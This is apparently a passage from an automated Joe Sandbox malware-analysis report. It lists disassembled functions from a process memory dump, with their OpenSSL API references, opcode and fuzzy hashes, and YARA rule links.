                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: g$g$}
                                                            • API String ID: 1767461275-1352947115
                                                            • Opcode ID: ccc2256917f9fe7c0ab432adcc65f55adaf3c314dad053ece8f17f973c5b0952
                                                            • Instruction ID: 392e0504da4805ed199dd5c1dea662fc9c8383d3ced21fff1e544cb17a302fe7
                                                            • Opcode Fuzzy Hash: ccc2256917f9fe7c0ab432adcc65f55adaf3c314dad053ece8f17f973c5b0952
                                                            • Instruction Fuzzy Hash: 645107713097018FDB04EF29C58061BBBF1BB8979CF21895DE5A98B740E735E900CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEF6510 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: i
                                                            • API String ID: 1767461275-3865851505
                                                            • Opcode ID: 16de3a4fd740626105cda6cea590530a791d459db6c64e02114645659f8855a8
                                                            • Instruction ID: 3ccb12a33800a258ed1d65d31b5288e01e1348be79592d18970eca19861406a9
                                                            • Opcode Fuzzy Hash: 16de3a4fd740626105cda6cea590530a791d459db6c64e02114645659f8855a8
                                                            • Instruction Fuzzy Hash: D751E4716097019FE7008F25C58471BBBF5BB85318F22891DE9A48BB90D375E54ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC4500 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ERR_func_error_string.LIBEAY32 ref: 6CEC4516
                                                            • ERR_load_strings.LIBEAY32 ref: 6CEC453F
                                                            • ERR_load_strings.LIBEAY32 ref: 6CEC4553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_load_strings$R_func_error_string
                                                            • String ID: F
                                                            • API String ID: 420603542-1304234792
                                                            • Opcode ID: adadb9ba5cf9e2a5928504fe8bb11de8a81a246aaffcfe5c38c18441fba4088c
                                                            • Instruction ID: c955b88d60d165116521f1b9038e8e2dcddab48dc04c6ba0c61b78a8493a57e7
                                                            • Opcode Fuzzy Hash: adadb9ba5cf9e2a5928504fe8bb11de8a81a246aaffcfe5c38c18441fba4088c
                                                            • Instruction Fuzzy Hash: 2B3105B02193008FE740DF25D68475ABBF0BF44308F22895DD5988B7A1D7B9D449CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF26DE0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_freeN1_item_newR_set__stack_chk_fail
                                                            • String ID: A$V
                                                            • API String ID: 2270492745-4260965250
                                                            • Opcode ID: a3e35be101b5b862219cca5c8dbe9b756f5044adf7a55c0b30eecc73940f9750
                                                            • Instruction ID: f2218bba5e875ed4b46f05df9592ac291de3cbce6d5b37cf8a5f465cdd69a292
                                                            • Opcode Fuzzy Hash: a3e35be101b5b862219cca5c8dbe9b756f5044adf7a55c0b30eecc73940f9750
                                                            • Instruction Fuzzy Hash: 0C21C0B16087419FDB10DFA9C58064BBBE0AB89308F01891DF9948B700E778E948CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF26E20 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_item_new.LIBEAY32 ref: 6CF26E5D
                                                            • ASN1_INTEGER_set.LIBEAY32 ref: 6CF26E7E
                                                              • Part of subcall function 6CEFC200: CRYPTO_free.LIBEAY32 ref: 6CEFC22E
                                                              • Part of subcall function 6CEFC200: CRYPTO_malloc.LIBEAY32 ref: 6CEFC24A
                                                            • ASN1_STRING_set.LIBEAY32 ref: 6CF26EA5
                                                            • ERR_put_error.LIBEAY32 ref: 6CF27047
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_setN1_item_newO_freeO_mallocR_put_errorR_set
                                                            • String ID: A$V
                                                            • API String ID: 4101849597-4260965250
                                                            • Opcode ID: 6c9d8d28c7f4136b102dbddcb3026f9e49619932e8271631ebad0c948ba02406
                                                            • Instruction ID: 11eb67f52d5e86dd92cf858512a3259617bf79b7092801879ce73ca26c2386c0
                                                            • Opcode Fuzzy Hash: 6c9d8d28c7f4136b102dbddcb3026f9e49619932e8271631ebad0c948ba02406
                                                            • Instruction Fuzzy Hash: C62145B16093409FDB00DFA5C58074BBBF0AF84348F01882DF9988BB04E779D808CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF545F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF54611
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF546D7
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF546DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_freeG_type_newO_mallocR_put_error
                                                            • String ID: @$A$A$}$~
                                                            • API String ID: 2937794366-1801014758
                                                            • Opcode ID: 9a59b99802a6a64502cbc84c540ad763d881e3299396fe4d6a89f636a8b0cd1f
                                                            • Instruction ID: e330a953687350dcdb9cd1455d4926188883cd25587d528972eb61319d4319c8
                                                            • Opcode Fuzzy Hash: 9a59b99802a6a64502cbc84c540ad763d881e3299396fe4d6a89f636a8b0cd1f
                                                            • Instruction Fuzzy Hash: 6C211AB06097018FD710EFA9D18465FFBF4AF94308F52882DE6D887B40D7B4D8598B52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF08E70 Relevance: 15.1, APIs: 10, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: 873feaf35299b093fcc12a2ff3686775e8be03d0e237ffb4cc717dde1996a848
                                                            • Instruction ID: e10a0cf6119248ecb16ce0e27f950e85b350a6d80e94f35988b92e09b8bde552
                                                            • Opcode Fuzzy Hash: 873feaf35299b093fcc12a2ff3686775e8be03d0e237ffb4cc717dde1996a848
                                                            • Instruction Fuzzy Hash: 3431C5716196419FCB50EF79C280A4FBBF1AB89318F529D1CE6A4CB704E730E9059F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF16F10 Relevance: 15.1, APIs: 10, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_freeN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 683933353-0
                                                            • Opcode ID: 67e65e3cced25204a1b2a7ed57ae0c43be5f7f47e9308963b2e037bcbdc6047c
                                                            • Instruction ID: 5b69b93dace299f096e2efeb33ecf99bd51b8e28ec6c5ce000b4a7081c697351
                                                            • Opcode Fuzzy Hash: 67e65e3cced25204a1b2a7ed57ae0c43be5f7f47e9308963b2e037bcbdc6047c
                                                            • Instruction Fuzzy Hash: 4231BA75A196019FCB50EF79C68064BBBF1AB89318F52991CE6A4CB704D330A905CF86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF70C50 Relevance: 15.1, APIs: 10, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
